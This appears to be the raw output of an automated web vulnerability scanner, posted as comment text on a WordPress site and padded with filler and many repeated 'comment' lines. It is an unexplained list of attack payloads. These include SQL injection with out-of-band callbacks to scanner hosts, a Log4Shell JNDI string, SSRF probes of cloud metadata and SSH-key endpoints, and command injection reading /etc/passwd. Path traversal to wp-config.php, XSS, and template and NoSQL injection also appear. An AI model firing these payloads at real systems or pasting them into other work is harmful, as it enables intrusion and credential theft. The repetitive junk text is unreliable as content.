aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
comment’;+exec+master..xp_dirtree+”//38279255f67f37e45b8033b008ac5742273522e0.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’131fead3251cc230f12cf2349b11b068258440f4.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\3ea7a32567e0638803ce57f7801e3ceb3e5b50ac.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\16b6ed33a9788795e7949c049421c20413129a45.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+e3debbc716472740e6796eb72a5ea82acc5a238f.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://d397075e0686011ef9c5e6003acaf67c26f471b1.oob.appspidered.rapid7.com/’)+END)–
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(14727,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(951,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(72,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(12343,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(731,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(40,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(2,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
commentx7xthoax
x7yb7ww5′”x7yb7ww5
comment
comment
comment
comment
comment
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
comment” && sleep(00) && “1”!=”1
comment” && sleep(10000) && “1”!=”1
comment” && “1”==”0
comment” && “1”==”1
comment’ && ‘1’==’0
comment’ && ‘1’==’1
http://appspidered.rapid7.com/
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/network/interfaces/macs/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/dynamic/instance-identity/document
http://169.254.169.254/metadata/instance/compute?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0?api-version=2019-08-15
http://169.254.169.254/metadata/instance/network/interface/0?api-version=2019-08-15
${jndi:ldap://dd05060e28cbb2133dcb135e8e8ea7ddfe02816c.oob.appspidered.rapid7.${lower:COM}}
http://appspidered.rapid7.com/xss/script/9e8277a466d71239bf81dbdcc59cceba7fec4e20
http://appspidered.rapid7.com/xss/script/4bce497659c1878a434be62df0d7ae644a7d7be1
http://appspidered.rapid7.com/xss/script/093077b5e7847be9f038da84f952b20aa85789ae
http://appspidered.rapid7.com/xss/script/e35dcc9994743530f4daf43371fb152d5088eb74
https://appspidered.rapid7.com/xss/script/0eda412efd6e283e3d33502fd72aa1eadd2f5874
https://appspidered.rapid7.com/xss/script/e3d03a1a40516b504ff81cdb58d4c005fef3f656
https://appspidered.rapid7.com/xss/script/8f55dffd139b4399df30abe9aba39d01a1a272a1
https://appspidered.rapid7.com/xss/script/15993d0f6743ae6c4ec376384c282af5cf434e61
http://appspidered.rapid7.com/xss/script/4927f19de5d325bae1203ffd00779607f6c1df6e
http://appspidered.rapid7.com/xss/script/b089868bd619c5244234f4876d350649e8a90aac
http://appspidered.rapid7.com/xss/script/85f276f569af198d747a73e044c30f6dcaf27709
http://appspidered.rapid7.com/xss/script/7ff3f0bad47e8c3a43be8ac8c42e8079e958c24f
https://appspidered.rapid7.com/xss/script/15a8081079af107dc492f5314f22ef737aead9a9
https://appspidered.rapid7.com/xss/script/7cf0c9982daea38381baaf5d89d91f0e7e21d3f7
https://appspidered.rapid7.com/xss/script/f22627b433c6f200e913a427c49d965934a4c05c
https://appspidered.rapid7.com/xss/script/2fb13f4343ef2325c6398df36a7bf6aa6e753942
appspidered.rapid7.com/xss/script/bd7320883df2dc9f8bdf173a3685c46c0a3e056b
appspidered.rapid7.com/xss/script/2c2672db81b12628fd661c1864ee813e391ca48c
appspidered.rapid7.com/xss/script/2b9cf076a863261c138ede97229c656709b39d20
appspidered.rapid7.com/xss/script/29f9df7950028819df17ccfd3aec5247ab2a4ffb
commentcommentcomment
655321
./*][
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
comment’;+exec+master..xp_dirtree+”//38279255f67f37e45b8033b008ac5742273522e0.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’131fead3251cc230f12cf2349b11b068258440f4.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\3ea7a32567e0638803ce57f7801e3ceb3e5b50ac.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\16b6ed33a9788795e7949c049421c20413129a45.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+e3debbc716472740e6796eb72a5ea82acc5a238f.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://d397075e0686011ef9c5e6003acaf67c26f471b1.oob.appspidered.rapid7.com/’)+END)–
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
*
|
comment|
&
comment&
comment)
!comment
‘comment
comment’
comment”
comment%’
comment%u0027
comment%27
comment%”
comment%u0022
comment%22
LIMIT a
1e309
char(0x27)char(0x27)comment
%u2018comment
%u2019comment
%u201acomment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
comment’ UNION ALL select NULL —
comment” UNION ALL select NULL —
SELECT * FROM “master”
SELECC * FROM “ds”
http://www.example.com/
https://example.com/
ftp://example.com/
http://example.com/
gopher://example.com/
example.com/
.example.com/
https://example.com/comment
‘.phpinfo().’
comment’ AND ‘1’=’0
comment’ AND ‘1’=’1
comment” AND “1”=”0
comment” AND “1”=”1
comment’ AND 1=0/*
comment’ AND 1=1/*
comment’ AND 1=0)/*
comment’ AND 1=1)/*
comment’ AND 1=0–
comment’ AND 1=1–
comment’ AND 1=0)–
comment’ AND 1=1)–
comment’) AND (‘1’=’0
comment’) AND (‘1’=’1
comment”) AND (“1″”=”0
comment”) AND (“1″”=”1
comment’ AND 1=0 LIMIT 1–
comment’ AND 1=1 LIMIT 1–
REPEAT(0x636f6d6d656e74,2)
REPEAT(0x636f6d6d656e74,1)
comment OR 1=1
comment OR 1=0
comment’ OR ‘1’=’1
comment’ OR ‘1’=’0
comment” OR “1”=”1
comment”) OR (“1″=”1
comment”) OR (“1″=”0
comment’ OR 1=0 —
comment” OR “1”=”0
comment’) OR (‘1’=’0
comment’) OR (‘1’=’1
comment’ OR 1=0 ##
comment’ OR 1=1 ##
comment’ OR 1=1 —
comment’) AND ‘1’ in (‘0
comment’) AND ‘1’ in (‘1
comment”) AND “1” in (“0
comment”) AND “1” in (“1
comment’) OR ‘1’ in (‘0
comment’) OR ‘1’ in (‘1
comment”) OR “1” in (“0
comment”) OR “1” in (“1
comment DESC
comment ASC
1, comment DESC
1, comment ASC
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(14727,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(951,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(72,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(4,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(12343,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(731,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(40,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(2,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(0,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(00)))a) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
‘ (select*from(select(sleep(00)))a) ‘
‘ (select*from(select(sleep(05)))a) ‘
comment’);WAITFOR DELAY ’00:00:00′–
comment’);WAITFOR DELAY ’00:00:05′–
comment AND pg_sleep(00) is not null
comment AND pg_sleep(05) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
comment ;select pg_sleep(00);– –
comment ;select pg_sleep(05);– –
alert(10400877)
alert(10527967)
alert(10663180)
alert(10790252)
“>alert(10909200)
“>alert(11028063)
“>alert(11142843)
“>alert(11253513)
‘>alert(11384733)
‘>alert(11491359)
‘>alert(11589736)
‘>alert(11688120)
“>
“>
“>
‘>
‘>
‘>
{constructor.constructor(12692424)}
{constructor.constructor(12909683)}
{constructor.constructor(13053087)}
{constructor.constructor(13196518)}
comment$0
comment;/etc/passwd
comment|/bin/cat /etc/passwd
comment|/bin/cat /etc/passwd|
comment;/etc/hosts
comment|/bin/cat /etc/hosts
comment|/bin/cat /etc/hosts|
comment;/usr/bin/id
comment|/bin/cat /usr/bin/id
comment|/bin/cat /usr/bin/id|
type c:\boot.ini
comment&dir
comment&ipconfig
echo foobar x7frai0o
comment&& echo foobar x7f9ealb
comment| echo foobar x7gqvk19
comment| echo foobar x7haurw3|
comment< echo foobar x7hsb2eg
netstat -na
comment&&netstat -na
comment|netstat -na
comment|netstat -na|
comment;netstat ;
comment<netstat -na
ping -h
comment&&ping -h
comment|ping -h
comment|ping -h|
comment<ping -h
$LANG
comment&&$LANG
comment|$LANG
comment|$LANG|
comment<$LANG
; free
;ping localhost -c 21;
;TIMEOUT /T 10 /NOBREAK;
x7r8saqr
x7so0m1x
x7s64emr: x7s64emr
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
d:\boot.ini
../../../../../../boot.ini.
../../../../../../boot.ini
noexistnoexist.
../../../../../../../../../../etc/hosts.
/..
\..
c:\..
/../../../../../../../../../../..
file:/etc/passwd
file:/wp-comments-post.php
/WEB-INF/web.xml
WEB-INF/web.xml
file:WEB-INF/web.xml
/../../WEB-INF/web.xml
\WEB-INF\web.xml
/../../../../../../../../../../.
noexistnoexist
http://localhost/
http://localhost:22/
package.json.bak
package.json.bak%00
../wp-config.php
http://appspidered.rapid7.com/rfi/x7f26zrp
/../../../../../../../../../../vendor.js
../../../../../
..\..\..\..\..\
< /etc/passwd
a
b
{comment
{‘comment
{“comment
comment{
comment’}
comment”}
comment}
comment/
comment/’
comment/”
/’comment
comment”}, {x7v3e4ji:{$meta: “textScore
comment’}, {x7wom9k1:{$meta: ‘textScore
comment”}}, {x7xd8p9r:{$meta: “textScore
comment’}, {x7xwchue:{$meta: ‘textScore
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment